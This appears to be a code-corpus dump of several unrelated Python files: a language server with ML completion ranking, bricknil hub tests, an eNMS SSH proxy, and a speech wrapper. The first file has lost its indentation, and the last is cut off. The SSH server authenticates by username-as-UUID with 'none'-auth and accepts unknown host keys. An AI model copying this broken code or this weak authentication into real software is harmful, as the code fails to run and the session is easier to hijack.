def _hook(self, hook_name, doc_uri=None, **kwargs):
"""Calls hook_name and returns a list of results from all registered handlers"""
workspace = self._match_uri_to_workspace(doc_uri)
doc = workspace.get_document(doc_uri) if doc_uri else None
hook_handlers = self.config.plugin_manager.subset_hook_caller(hook_name, self.config.disabled_plugins)
return hook_handlers(config=self.config, workspace=workspace, document=doc, **kwargs)
def capabilities(self):
server_capabilities = {
'codeActionProvider': True,
'codeLensProvider': {
'resolveProvider': False, # We may need to make this configurable
},
'completionProvider': {
'resolveProvider': True,
'triggerCharacters': ['.']
},
'documentFormattingProvider': True,
'documentHighlightProvider': True,
'documentRangeFormattingProvider': True,
'documentSymbolProvider': True,
'definitionProvider': True,
'executeCommandProvider': {
'commands': flatten(self._hook('pyls_commands'))
},
'hoverProvider': True,
'referencesProvider': True,
'renameProvider': True,
'foldingRangeProvider': True,
'signatureHelpProvider': {
'triggerCharacters': ['(', ',', '=']
},
'textDocumentSync': {
'change': lsp.TextDocumentSyncKind.INCREMENTAL,
'save': {
'includeText': True,
},
'openClose': True,
},
'workspace': {
'workspaceFolders': {
'supported': True,
'changeNotifications': True
}
},
'experimental': merge(self._hook('pyls_experimental_capabilities'))
}
log.info('Server capabilities: %s', server_capabilities)
return server_capabilities
def m_initialize(self, processId=None, rootUri=None, rootPath=None, initializationOptions=None, **_kwargs):
log.debug('Language server initialized with %s %s %s %s', processId, rootUri, rootPath, initializationOptions)
if rootUri is None:
rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ''
self.workspaces.pop(self.root_uri, None)
self.root_uri = rootUri
self.config = config.Config(rootUri, initializationOptions or {},
processId, _kwargs.get('capabilities', {}))
self.workspace = Workspace(rootUri, self._endpoint, self.config)
self.workspaces[rootUri] = self.workspace
self._dispatchers = self._hook('pyls_dispatchers')
self._hook('pyls_initialize')
if self._check_parent_process and processId is not None and self.watching_thread is None:
def watch_parent_process(pid):
# exit when the given pid is not alive
if not _utils.is_process_alive(pid):
log.info("parent process %s is not alive, exiting!", pid)
self.m_exit()
else:
threading.Timer(PARENT_PROCESS_WATCH_INTERVAL, watch_parent_process, args=[pid]).start()
self.watching_thread = threading.Thread(target=watch_parent_process, args=(processId,))
self.watching_thread.daemon = True
self.watching_thread.start()
# Get our capabilities
return {'capabilities': self.capabilities()}
def m_initialized(self, **_kwargs):
self._hook('pyls_initialized')
def code_actions(self, doc_uri, range, context):
return flatten(self._hook('pyls_code_actions', doc_uri, range=range, context=context))
def code_lens(self, doc_uri):
return flatten(self._hook('pyls_code_lens', doc_uri))
def completions(self, doc_uri, position):
res = self._hook('pyls_completions', doc_uri, position=position)
if len(res) == 0 or len(res[0]) == 0:
return
completions = res[0][0]
code = res[0][1]
encoded_line = []
if len(code) != 0:
g = code.split(" ")
tokenized_line = [token for token in g[:-1]]
# remove infrequent words (get the list or set or map from deepnote)
filtered_line = list(
filter(lambda x: x in self.vocab, tokenized_line))
if len(filtered_line) == 0:
encoded_line = np.array([np.zeros(len(self.encodings))
for _ in range(40)])
else:
for item in filtered_line:
temp = np.zeros(len(self.encodings))
temp[self.encodings[item]] = 1
encoded_line.append(temp)
# one-hot encode and pad line
encoded_line = keras.preprocessing.sequence.pad_sequences(
[encoded_line], maxlen=40)
else:
encoded_line = [np.zeros(len(self.encodings))
for _ in range(40)]
oov_completions = []
enc_completions = {}
for i, c in enumerate(completions):
if c['label'] in self.vocab:
tmp = np.zeros(len(self.encodings))
tmp[self.encodings[c['label']]] = 1
enc_completions[c['label']] = (c, tmp)
else:
oov_completions.append(c)
prediction_scores = []
model_input_seq = encoded_line.reshape(1, 40, 1991)
for c in enc_completions.keys():
comp, enc = enc_completions[c]
model_input_compl = [enc]
score = self.model.predict([np.array(model_input_seq), np.array(model_input_compl)])
prediction_scores.append((comp, score[0][0]))
prediction_scores = sorted(prediction_scores, key=lambda x: x[1], reverse=True)
preds = [pred for (pred, score) in prediction_scores]
preds = preds + oov_completions
for i, comp in enumerate(preds):
comp['sortText'] = chr(ord('a') + i)
comp['insertText'] = comp['label']
log.debug("completions are here")
log.debug(preds)
return {
'isIncomplete': True,
'items': preds
}
def completion_detail(self, item):
detail = self._hook('pyls_completion_detail', item=item)
return detail
def definitions(self, doc_uri, position):
return flatten(self._hook('pyls_definitions', doc_uri, position=position))
def document_symbols(self, doc_uri):
return flatten(self._hook('pyls_document_symbols', doc_uri))
def execute_command(self, command, arguments):
return self._hook('pyls_execute_command', command=command, arguments=arguments)
def format_document(self, doc_uri):
return self._hook('pyls_format_document', doc_uri)
def format_range(self, doc_uri, range):
return self._hook('pyls_format_range', doc_uri, range=range)
def highlight(self, doc_uri, position):
return flatten(self._hook('pyls_document_highlight', doc_uri, position=position)) or None
def hover(self, doc_uri, position):
return self._hook('pyls_hover', doc_uri, position=position) or {'contents': ''}
@_utils.debounce(LINT_DEBOUNCE_S, keyed_by='doc_uri')
def lint(self, doc_uri, is_saved):
# Since we're debounced, the document may no longer be open
workspace = self._match_uri_to_workspace(doc_uri)
if doc_uri in workspace.documents:
workspace.publish_diagnostics(
doc_uri,
flatten(self._hook('pyls_lint', doc_uri, is_saved=is_saved))
)
def references(self, doc_uri, position, exclude_declaration):
return flatten(self._hook(
'pyls_references', doc_uri, position=position,
exclude_declaration=exclude_declaration
))
def rename(self, doc_uri, position, new_name):
return self._hook('pyls_rename', doc_uri, position=position, new_name=new_name)
def signature_help(self, doc_uri, position):
return self._hook('pyls_signature_help', doc_uri, position=position)
def folding(self, doc_uri):
return self._hook('pyls_folding_range', doc_uri)
def m_text_document__did_close(self, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
workspace.rm_document(textDocument['uri'])
def m_text_document__did_open(self, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
workspace.put_document(textDocument['uri'], textDocument['text'], version=textDocument.get('version'))
self._hook('pyls_document_did_open', textDocument['uri'])
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__did_change(self, contentChanges=None, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
for change in contentChanges:
workspace.update_document(
textDocument['uri'],
change,
version=textDocument.get('version')
)
self.lint(textDocument['uri'], is_saved=False)
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__code_action(self, textDocument=None, range=None, context=None, **_kwargs):
return self.code_actions(textDocument['uri'], range, context)
def m_text_document__code_lens(self, textDocument=None, **_kwargs):
return self.code_lens(textDocument['uri'])
def m_text_document__completion(self, textDocument=None, position=None, **_kwargs):
return self.completions(textDocument['uri'], position)
def m_completion_item__resolve(self, label=None, **_kwargs):
return self.completion_detail(label)
def m_text_document__definition(self, textDocument=None, position=None, **_kwargs):
return self.definitions(textDocument['uri'], position)
def m_text_document__document_highlight(self, textDocument=None, position=None, **_kwargs):
return self.highlight(textDocument['uri'], position)
def m_text_document__hover(self, textDocument=None, position=None, **_kwargs):
return self.hover(textDocument['uri'], position)
def m_text_document__document_symbol(self, textDocument=None, **_kwargs):
return self.document_symbols(textDocument['uri'])
def m_text_document__formatting(self, textDocument=None, _options=None, **_kwargs):
# For now we're ignoring formatting options.
return self.format_document(textDocument['uri'])
def m_text_document__rename(self, textDocument=None, position=None, newName=None, **_kwargs):
return self.rename(textDocument['uri'], position, newName)
def m_text_document__folding_range(self, textDocument=None, **_kwargs):
return self.folding(textDocument['uri'])
def m_text_document__range_formatting(self, textDocument=None, range=None, _options=None, **_kwargs):
# Again, we'll ignore formatting options for now.
return self.format_range(textDocument['uri'], range)
def m_text_document__references(self, textDocument=None, position=None, context=None, **_kwargs):
exclude_declaration = not context['includeDeclaration']
return self.references(textDocument['uri'], position, exclude_declaration)
def m_text_document__signature_help(self, textDocument=None, position=None, **_kwargs):
return self.signature_help(textDocument['uri'], position)
def m_workspace__did_change_configuration(self, settings=None):
self.config.update((settings or {}).get('pyls', {}))
for workspace_uri in self.workspaces:
workspace = self.workspaces[workspace_uri]
workspace.update_config(self.config)
for doc_uri in workspace.documents:
self.lint(doc_uri, is_saved=False)
def m_workspace__did_change_workspace_folders(self, added=None, removed=None, **_kwargs):
for removed_info in removed:
removed_uri = removed_info['uri']
self.workspaces.pop(removed_uri)
for added_info in added:
added_uri = added_info['uri']
self.workspaces[added_uri] = Workspace(added_uri, self._endpoint, self.config)
# Migrate documents that are on the root workspace and have a better
# match now
doc_uris = list(self.workspace._docs.keys())
for uri in doc_uris:
doc = self.workspace._docs.pop(uri)
new_workspace = self._match_uri_to_workspace(uri)
new_workspace._docs[uri] = doc
def m_workspace__did_change_watched_files(self, changes=None, **_kwargs):
    """LSP ``workspace/didChangeWatchedFiles``: re-lint docs affected by disk changes."""
    changed_py_files = set()
    config_changed = False
    for d in (changes or []):
        if d['uri'].endswith(PYTHON_FILE_EXTENSIONS):
            changed_py_files.add(d['uri'])
        elif d['uri'].endswith(CONFIG_FILEs):
            config_changed = True
    if config_changed:
        # A lint-config file changed: drop cached settings before re-linting.
        self.config.settings.cache_clear()
    elif not changed_py_files:
        # Only externally changed python files and lint configs may result in changed diagnostics.
        return
    for workspace_uri in self.workspaces:
        workspace = self.workspaces[workspace_uri]
        for doc_uri in workspace.documents:
            # Changes in doc_uri are already handled by m_text_document__did_save
            if doc_uri not in changed_py_files:
                self.lint(doc_uri, is_saved=False)
def m_workspace__execute_command(self, command=None, arguments=None):
    """LSP ``workspace/executeCommand``: delegate to the command executor."""
    result = self.execute_command(command, arguments)
    return result
def flatten(list_of_lists):
    """Concatenate a sequence of lists into one flat list (order preserved)."""
    flat = []
    for sub in list_of_lists:
        flat.extend(sub)
    return flat
def merge(list_of_dicts):
    """Merge dicts left-to-right; later dicts win on duplicate keys."""
    merged = {}
    for mapping in list_of_dicts:
        merged.update(mapping)
    return merged
|
test_hub.py | import pytest
import os, struct, copy, sys
from functools import partial
import logging, threading
from asyncio import coroutine
from curio import kernel, sleep, spawn, Event
import time
from mock import Mock
from mock import patch, call, create_autospec
from mock import MagicMock
from mock import PropertyMock
from hypothesis import given, example, settings
from hypothesis import strategies as st
from bricknil.message_dispatch import MessageDispatch
from bricknil.messages import UnknownMessageError, HubPropertiesMessage
from bricknil.sensor import *
from bricknil.const import DEVICES
from bricknil import attach, start
from bricknil.hub import PoweredUpHub, Hub, BoostHub, DuploTrainHub, PoweredUpRemote
import bricknil
import bricknil.const
class TestSensors:
    """Hypothesis-driven tests: attach every sensor type to every hub type and
    drive fake BLE attach/value-change events through the peripheral queue.

    Relies on the MockBLE / MockBleak test doubles defined later in this file
    and on the curio kernel for async execution.
    """

    def setup(self):
        # Create the main dispatch
        self.hub = MagicMock()
        self.m = MessageDispatch(self.hub)
        # Sensor and hub types the property-based tests sample from.
        self.sensor_list = [CurrentSensor,
                            DuploSpeedSensor,
                            VisionSensor,
                            InternalTiltSensor,
                            ExternalMotionSensor,
                            ExternalTiltSensor,
                            RemoteButtons,
                            Button,
                            DuploVisionSensor,
                            VoltageSensor,
                            ]
        self.hub_list = [PoweredUpHub, BoostHub, DuploTrainHub, PoweredUpRemote]

    def _with_header(self, msg: bytearray):
        # Prepend the 2-byte header [total_length, 0] used by the BLE protocol.
        l = len(msg) + 2
        assert l < 127  # single-byte length encoding only
        return bytearray([l, 0] + list(msg))

    def _draw_capabilities(self, data, sensor):
        """Draw a hypothesis sample of capabilities that is valid for *sensor*."""
        if len(sensor.allowed_combo) > 0:
            # test capabilities 1 by 1,
            # or some combination of those in the allowed_combo list
            capabilities = data.draw(
                st.one_of(
                    st.lists(st.sampled_from([cap.name for cap in list(sensor.capability)]), min_size=1, max_size=1),
                    st.lists(st.sampled_from(sensor.capability), min_size=1, max_size=1),
                    st.lists(st.sampled_from(sensor.allowed_combo), min_size=1, unique=True)
                )
            )
        else:
            # if no combos allowed, then just test 1 by 1
            capabilities = data.draw(st.lists(st.sampled_from(sensor.capability), min_size=1, max_size=1))
        return capabilities

    def _get_hub_class(self, hub_type, sensor, sensor_name, capabilities):
        """Build a TestHub subclass of *hub_type* with *sensor* attached.

        Returns the class plus an Event that run() blocks on, so the caller
        can stop the hub from outside.
        """
        stop_evt = Event()

        @attach(sensor, name=sensor_name, capabilities=capabilities)
        class TestHub(hub_type):
            async def sensor_change(self):
                pass

            async def run(self):
                pass  # NOTE(review): stray no-op kept as in the original
                await stop_evt.wait()

        return TestHub, stop_evt

    # @patch('bricknil.hub.PoweredUpHub', autospec=True, create=True)
    @given(data=st.data())
    def test_attach_sensor(self, data):
        sensor_name = 'sensor'
        sensor = data.draw(st.sampled_from(self.sensor_list))
        capabilities = self._draw_capabilities(data, sensor)
        hub_type = data.draw(st.sampled_from(self.hub_list))
        TestHub, stop_evt = self._get_hub_class(hub_type, sensor, sensor_name, capabilities)
        hub = TestHub('testhub')
        # Check to make sure we have the peripheral attached
        # and the sensor inserted as an attribute
        assert sensor_name in hub.peripherals
        assert hasattr(hub, sensor_name)

    @given(data=st.data())
    def test_run_hub(self, data):
        # Reset the global hub registry between hypothesis examples.
        Hub.hubs = []
        sensor_name = 'sensor'
        sensor = data.draw(st.sampled_from(self.sensor_list))
        capabilities = self._draw_capabilities(data, sensor)
        hub_type = data.draw(st.sampled_from(self.hub_list))
        TestHub, stop_evt = self._get_hub_class(hub_type, sensor, sensor_name, capabilities)
        hub = TestHub('test_hub')
        # Start the hub
        # kernel.run(self._emit_control(TestHub))
        with patch('Adafruit_BluefruitLE.get_provider') as ble, \
             patch('bricknil.ble_queue.USE_BLEAK', False) as use_bleak:
            ble.return_value = MockBLE(hub)
            sensor_obj = getattr(hub, sensor_name)
            sensor_obj.send_message = Mock(side_effect=coroutine(lambda x, y: "the awaitable should return this"))
            kernel.run(self._emit_control, data, hub, stop_evt, ble(), sensor_obj)
            # start(system)

    async def _wait_send_message(self, mock_call, msg):
        # Poll until the mocked send_message was called with a payload
        # containing *msg*.
        print("in mock")
        while not mock_call.call_args:
            await sleep(0.01)
        while not msg in mock_call.call_args[0][0]:
            print(mock_call.call_args)
            await sleep(0.01)

    async def _emit_control(self, data, hub, hub_stop_evt, ble, sensor):
        """Drive the hub: simulate attach, activation, and a value change."""
        async def dummy():
            pass
        system = await spawn(bricknil.bricknil._run_all(ble, dummy))
        while not hub.peripheral_queue:
            await sleep(0.1)
        # await sleep(3)
        # Simulate the hub reporting the sensor attached on a random port.
        port = data.draw(st.integers(0, 254))
        await hub.peripheral_queue.put(('attach', (port, sensor.sensor_name)))
        # Now, make sure the sensor sent an activate updates message
        if sensor.sensor_name == "Button":
            await self._wait_send_message(sensor.send_message, 'Activate button')
        else:
            await self._wait_send_message(sensor.send_message, 'Activate SENSOR')
        # Need to generate a value on the port
        # if False:
        msg = []
        if len(sensor.capabilities) == 1:
            # Handle single capability
            for cap in sensor.capabilities:
                n_datasets, byte_count = sensor.datasets[cap][0:2]
                for i in range(n_datasets):
                    for b in range(byte_count):
                        msg.append(data.draw(st.integers(0, 255)))
            msg = bytearray(msg)
            await hub.peripheral_queue.put(('value_change', (port, msg)))
        elif len(sensor.capabilities) > 1:
            # Multi-capability message starts with a mode bitmask.
            modes = 1
            msg.append(modes)
            for cap_i, cap in enumerate(sensor.capabilities):
                if modes & (1 << cap_i):
                    n_datasets, byte_count = sensor.datasets[cap][0:2]
                    for i in range(n_datasets):
                        for b in range(byte_count):
                            msg.append(data.draw(st.integers(0, 255)))
            msg = bytearray(msg)
            await hub.peripheral_queue.put(('value_change', (port, msg)))
        await hub_stop_evt.set()
        await system.join()

    @given(data=st.data())
    def test_run_hub_with_bleak(self, data):
        Hub.hubs = []
        sensor_name = 'sensor'
        sensor = data.draw(st.sampled_from(self.sensor_list))
        capabilities = self._draw_capabilities(data, sensor)
        hub_type = data.draw(st.sampled_from(self.hub_list))
        TestHub, stop_evt = self._get_hub_class(hub_type, sensor, sensor_name, capabilities)
        hub = TestHub('test_hub')

        async def dummy():
            pass
        # Start the hub
        # MockBleak = MagicMock()
        # Shadow the real bleak module with the test double.
        sys.modules['bleak'] = MockBleak(hub)
        with patch('bricknil.bricknil.USE_BLEAK', True), \
             patch('bricknil.ble_queue.USE_BLEAK', True) as use_bleak:
            sensor_obj = getattr(hub, sensor_name)
            sensor_obj.send_message = Mock(side_effect=coroutine(lambda x, y: "the awaitable should return this"))
            from bricknil.bleak_interface import Bleak
            ble = Bleak()
            # Run curio in a thread
            async def dummy(): pass

            async def start_curio():
                system = await spawn(bricknil.bricknil._run_all(ble, dummy))
                # Wait until the mock device is connected and notifying.
                while len(ble.devices) < 1 or not ble.devices[0].notify:
                    await sleep(0.01)
                await stop_evt.set()
                print("sending quit")
                await ble.in_queue.put(('quit', ''))
                # await system.join()
                print('system joined')

            def start_thread():
                kernel.run(start_curio)
            t = threading.Thread(target=start_thread)
            t.start()
            print('started thread for curio')
            ble.run()
            t.join()
class MockBleak(MagicMock):
    """Stand-in for the ``bleak`` module, installed via ``sys.modules['bleak']``.

    NOTE(review): subclasses MagicMock but __init__ never calls
    super().__init__(), so MagicMock's own machinery is not initialized on
    instances — confirm this is intentional.
    """

    def __init__(self, hub):
        # Stored on the class so the classmethod fakes below can reach it.
        MockBleak.hub = hub
        pass

    @classmethod
    async def discover(cls, timeout, loop):
        # Need to return devices here, which is a list of device tuples
        hub = MockBleak.hub
        devices = [MockBleakDevice(hub.uart_uuid, hub.manufacturer_id)]
        return devices

    @classmethod
    def BleakClient(cls, address, loop):
        print("starting BleakClient")
        hub = MockBleak.hub
        device = MockBleakDevice(hub.uart_uuid, hub.manufacturer_id)
        return device
class MockBleakDevice:
    """Stand-in for a bleak BLE device advertising the hub's UART service."""

    def __init__(self, uuid, manufacturer_id):
        # Not yet notifying; start_notify() flips this on.
        self.notify = False
        self.name = ""
        self.address = "XX:XX:XX:XX:XX"
        self.uuids = [str(uuid)]
        # Second advertised value carries the manufacturer id.
        self.manufacturer_data = {'values': [0, manufacturer_id]}

    async def connect(self):
        # Expose the hub's characteristic UUID like a connected device would.
        self.characteristics = MockBleak.hub.char_uuid

    async def write_gatt_char(self, char_uuid, msg_bytes):
        print(f'Got msg on {char_uuid}: {msg_bytes}')

    async def start_notify(self, char_uuid, handler):
        print("started notify")
        self.notify = True

    async def disconnect(self):
        print("device disconnected")
class MockBLE:
    """Stand-in for the Adafruit_BluefruitLE provider object."""

    def __init__(self, hub):
        self.hub = hub

    def initialize(self):
        print("initialized")

    def clear_cached_data(self):
        pass

    def get_default_adapter(self):
        self.mock_adapter = MockAdapter()
        return self.mock_adapter

    def find_devices(self, service_uuids):
        # Advertise exactly one device that matches the hub under test.
        self.device = MockDevice(hub_name=self.hub.ble_name, hub_id=self.hub.manufacturer_id)
        return [self.device]

    def run_mainloop_with(self, func):
        print("run mainloop")
        func()
class MockAdapter:
    """Stand-in BLE adapter; power/scan control is a no-op with logging."""

    def __init__(self):
        self.name = 'Mock adapter'

    def power_on(self):
        pass

    def start_scan(self):
        print("start scan called")

    def stop_scan(self):
        print("stop scan called")
class MockDevice:
    """Stand-in for an advertised BLE device matching the hub under test."""

    def __init__(self, hub_name, hub_id):
        # Last advertised value carries the manufacturer id the scanner checks.
        self.advertised = [-1, -1, -1, -1, hub_id]
        self.id = 'XX:XX:XX:XX:XX:XX'
        self.name = hub_name

    def connect(self):
        print("device connect called")

    def discover(self, uart_uuid, char_uuid):
        print(f'discover called on uart {uart_uuid}, char {char_uuid}')
        self.uart_uuid = uart_uuid
        self.char = char_uuid

    def find_service(self, uart_uuid):
        self.uart = MockUart()
        return self.uart

    def disconnect(self):
        print('device disconnect called')
class MockUart:
    """Stand-in UART service that acts as its own single characteristic."""

    def __init__(self):
        pass

    def find_characteristic(self, char_uuid):
        # Remember the uuid and return ourselves as the characteristic object.
        self.char_uuid = char_uuid
        return self

    def start_notify(self, callback):
        # Spawn a task to do the attachments, etc
        self.notify = callback

    def write_value(self, values):
        print(f'received values: {values}')
ssh.py | from logging import getLogger, FileHandler, Formatter
from paramiko import (
AUTH_FAILED,
AUTH_SUCCESSFUL,
RSAKey,
OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED as OPEN_FAILED,
OPEN_SUCCEEDED,
ServerInterface,
SSHClient,
Transport,
WarningPolicy,
)
from pathlib import Path
from socket import AF_INET, socket, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
from string import printable
from threading import Event, Thread
from time import sleep
from eNMS.database import db
class Client(SSHClient):
    """Paramiko SSH client that connects and opens an interactive shell on construction."""

    def __init__(self, hostname, username, password):
        super().__init__()
        self.load_system_host_keys()
        # WarningPolicy: accept unknown host keys but emit a warning.
        self.set_missing_host_key_policy(WarningPolicy)
        self.connect(
            hostname=hostname, username=username, password=password, timeout=3,
        )
        # Interactive shell channel used by SshConnection's pump threads.
        self.shell = self.invoke_shell()
class Server(ServerInterface):
    """Minimal paramiko SSH server bound to *port*.

    Accepts a single TCP client, then speaks SSH over it.  Authentication is
    "none"-auth only: the presented username must equal *uuid*, which acts as
    a one-time shared secret.
    """

    def __init__(self, port, uuid):
        self.event = Event()
        self.username = uuid
        sock = socket(AF_INET, SOCK_STREAM)
        sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        sock.bind(("", port))
        sock.listen(100)
        sock.settimeout(30)  # give the client up to 30s to connect
        # Blocks until a TCP client connects (or the timeout raises).
        self.transport = Transport(sock.accept()[0])
        try:
            host_key = RSAKey.from_private_key_file("rsa.key")
        except FileNotFoundError:
            # First run: generate and persist a host key for reuse.
            host_key = RSAKey.generate(2048)
            host_key.write_private_key_file("rsa.key")
        self.transport.add_server_key(host_key)
        self.transport.start_server(server=self)
        # NOTE(review): accept() may return None after 10s — callers assume
        # a live channel; confirm the timeout case is handled upstream.
        self.channel = self.transport.accept(10)

    def check_channel_request(self, kind, *_):
        # Only plain "session" channels are permitted.
        return OPEN_SUCCEEDED if kind == "session" else OPEN_FAILED

    def check_auth_none(self, username):
        # The uuid-as-username is the whole authentication scheme.
        return AUTH_SUCCESSFUL if username == self.username else AUTH_FAILED

    def check_channel_shell_request(self, *_):
        self.event.set()
        return True

    def check_channel_pty_request(self, *_):
        return True
class SshConnection:
    """Bridge between a local SSH server (front end) and a remote device
    (via Client), logging everything that flows device -> user.

    NOTE(review): __init__ accepts session_id, uuid and port but does not use
    them — they are passed again to start_session(); confirm the duplicated
    signature is intentional.
    """

    def __init__(self, hostname, username, password, session_id, uuid, port):
        self.client = Client(hostname, username, password)
        path = Path.cwd() / "logs" / "ssh_sessions"
        path.mkdir(parents=True, exist_ok=True)
        # One logger per hostname; the guard avoids stacking duplicate
        # handlers when several sessions target the same host.
        self.logger = getLogger(hostname)
        if not self.logger.handlers:
            file_handler = FileHandler(filename=path / f"{hostname}.log")
            formatter = Formatter("%(asctime)s %(levelname)-8s %(message)s")
            file_handler.setFormatter(formatter)
            self.logger.addHandler(file_handler)

    def start_session(self, session_id, uuid, port):
        # Server() blocks until the front-end SSH client connects.
        self.server = Server(port, uuid)
        Thread(target=self.receive_data, args=(session_id,)).start()
        Thread(target=self.send_data).start()

    def receive_data(self, session_id):
        """Pump device -> front end, persisting printable output per line."""
        log, session = "", db.fetch("session", id=session_id)
        while not self.client.shell.closed:
            response = self.client.shell.recv(1024)
            if not response:
                continue
            self.server.channel.send(response)
            # Keep only printable characters for the persistent log.
            log += "".join(c for c in str(response, "utf-8") if c in printable)
            if "\n" not in log:
                continue
            else:
                parsed_log = "\n".join(line for line in log.splitlines() if line)
                self.logger.info(parsed_log)
                session.content += parsed_log
                log = ""
            sleep(0.1)
        # NOTE(review): committed once, after the shell closes — confirm
        # mid-session content is not expected to be persisted earlier.
        db.session.commit()

    def send_data(self):
        """Pump front end -> device until either side closes."""
        while not self.client.shell.closed:
            data = self.server.channel.recv(512)
            if not data:
                break
            try:
                self.client.shell.send(data)
            except OSError:
                break
            sleep(0.1)
        self.client.shell.close()
        self.server.transport.close()
|
__init__.py | import sys
import win32com.client
import speech_recognition as sr
import threading
import time
from . import common
__all__ = [
'語音合成', '設定語音音量', '設定語音速度', '語音說完了嗎',
'語音辨識google', '辨識成功了嗎', '取得辨識文字',
'等待語音說完','語音辨識azure', '暫停語音辨識',
'繼續語音辨識', '語音辨識中嗎',
]
# tts init
# SAPI.SpVoice is the Windows Speech API COM text-to-speech engine.
common.speaker = win32com.client.Dispatch("SAPI.SpVoice")
common.speaker.Volume = common.DEFAULT_VOLUME
common.speaker.Rate = common.DEFAULT_RATE
# recognization init
common.recognizer = sr.Recognizer()
# Short pause threshold so utterances are segmented quickly.
common.recognizer.pause_threshold = 0.5
try:
    common.mic = sr.Microphone()
except OSError:
    # No microphone device: recognition is disabled, TTS still works.
    print('<<無麥克風裝置, 無法使用語音辨識>>')
    common.mic = None
# Protects shared recognition state (recog_text, recog_paused, recog_discard).
common.lock = threading.Lock()
### Custom Exceptions
# class ImageReadError(Exception):
# def __init__(self, value):
# message = f"無法讀取圖片檔 (檔名:{value})"
# super().__init__(message)
# stt
### wrapper functions
def 語音合成(text, 等待=True):
    """Speak *text* via SAPI; block until done when 等待 (wait) is True."""
    flag = common.SVSFDefault if 等待 else common.SVSFlagsAsync
    common.speaker.Speak(text, flag)
def 設定語音音量(volume):
    """Set TTS volume, clamped to the 0..100 range."""
    clamped = min(max(volume, 0), 100)
    common.speaker.Volume = clamped
def 設定語音速度(rate):
    """Set TTS speaking rate, clamped to the -10..10 range."""
    clamped = min(max(rate, -10), 10)
    common.speaker.Rate = clamped
def 語音說完了嗎(ms=1):
    """Poll whether speech output has finished, waiting at most *ms* (SAPI WaitUntilDone)."""
    return common.speaker.WaitUntilDone(ms)
def 等待語音說完():
    """Block until speech output completes (-1 waits indefinitely per SAPI)."""
    return common.speaker.WaitUntilDone(-1)
#### recog wrapper function
def recog_callback(recognizer, audio):
    """Background-listen callback: recognize *audio* and publish the text.

    NOTE(review): only used by the commented-out listen_in_background
    variants below; the active implementation is recog_thread().
    """
    if common.recog_paused:
        print('pausing')
        return
    try:
        if common.recog_service == 'google':
            text = recognizer.recognize_google(audio, language="zh-TW")
        elif common.recog_service == 'azure':
            text = recognizer.recognize_azure(audio, language="zh-TW",
                                              key=common.recog_key, location=common.recog_location)
        # NOTE(review): if recog_service is neither value, `text` is unbound
        # here and the next line raises NameError — confirm the service is
        # always set while listening.
        if text:
            print('<<', common.recog_service, '辨識為: ', text, '>>')
            with common.lock:
                common.recog_text = text
        # NOTE(review): countdown is decremented without holding the lock.
        common.recog_countdown -= 1
        if common.recog_countdown <= 0:
            common.stopper(wait_for_stop=False)
            common.recog_service = False
            print('<<超過次數,語音辨識程式停止>>')
    except sr.UnknownValueError:
        print("<<語音內容無法辨識>>")
        common.recog_countdown -= 1
    except sr.RequestError as e:
        print('<<', common.recog_service, "語音辦識無回應(可能無網路或是超過限制)>>: {0}".format(e))
        common.recog_countdown -= 1
########## rewrite background listen recog thread
def recog_thread():
    """Daemon loop: listen on the microphone and recognize speech.

    Uses the service selected in common.recog_service ('google' or 'azure').
    Results are published to common.recog_text under common.lock.  The loop
    ends when common.recog_countdown reaches zero.
    """
    with common.mic as source:
        print('<<校正麥克風...>>')
        common.recognizer.adjust_for_ambient_noise(source)
        while True:
            if common.recog_paused:
                # print('pausing')
                time.sleep(0.1)
                continue
            try:
                voice = common.recognizer.listen(source, timeout=3, phrase_time_limit=4)
            except sr.WaitTimeoutError:
                print('<<超過等待時間未有聲音>>')
                time.sleep(0.1)
                continue
            # Audio captured while pausing is thrown away once.
            if common.recog_discard:
                # print('paused during listening, discard voice')
                with common.lock:
                    common.recog_discard = False
                continue
            try:
                if common.recog_service == 'google':
                    text = common.recognizer.recognize_google(voice, language="zh-TW")
                    print("<<Google 語音辨識為:", text, '>>')
                elif common.recog_service == 'azure':
                    text = common.recognizer.recognize_azure(voice, language="zh-TW",
                                                             key=common.recog_key, location=common.recog_location)
                    print("<<Azure 語音辨識為:", text, '>>')
                # text = common.recognizer.recognize_google(voice, language="zh-tw")
                # print("<<Google 語音辨識為:", text,'>>')
                # A pause request arriving mid-recognition discards the text.
                if common.recog_discard:
                    # print('paused during recognizing, discard text')
                    with common.lock:
                        common.recog_discard = False
                    continue
                if text:
                    with common.lock:
                        common.recog_text = text
                common.recog_countdown -= 1
                if common.recog_countdown <= 0:
                    print('<<超過次數,語音辨識程式停止>>')
                    common.recog_service = False
                    break
            except sr.UnknownValueError:
                print("<<語音內容無法辨識>>")
                common.recog_countdown -= 1
            except sr.RequestError as e:
                print('<<', common.recog_service, "語音辦識無回應(可能無網路或是超過限制)>>: {0}".format(e))
                common.recog_countdown -= 1
def 語音辨識google(次數=15):
    """Start background Google speech recognition for up to *次數* results."""
    if not common.mic:
        print('<<無麥克風裝置, 無法使用語音辨識>>')
        return
    if common.recog_service:
        print("<<語音辨識已啟動>>")
        return
    # Arm the shared state, then launch the daemon recognizer thread.
    common.recog_countdown = 次數
    common.recog_service = 'google'
    common.recog_paused = False
    worker = threading.Thread(target=recog_thread, daemon=True)
    worker.start()
    print('<<開始語音辨識: 採google服務>>')
# def 語音辨識google(次數=15):
# if common.recog_service:
# print("<<語音辨識已啟動>>")
# return
# # start recog service
# with common.mic as source:
# print('<<校正麥克風...>>')
# common.recognizer.adjust_for_ambient_noise(source)
# common.stopper = common.recognizer.listen_in_background(
# common.mic, recog_callback, phrase_time_limit=10)
# print('<<開始語音辨識: 採google服務>>\n<<請說話>>')
# common.recog_countdown = 次數
# common.recog_service = 'google'
# common.recog_paused = False
def 語音辨識azure(key, location='westus'):
    """Start background Azure speech recognition using *key* / *location*."""
    if not common.mic:
        print('<<無麥克風裝置, 無法使用語音辨識>>')
        return
    if common.recog_service:
        print("<<語音辨識已啟動>>")
        return
    # Arm the shared state, then launch the daemon recognizer thread.
    common.recog_countdown = 1000
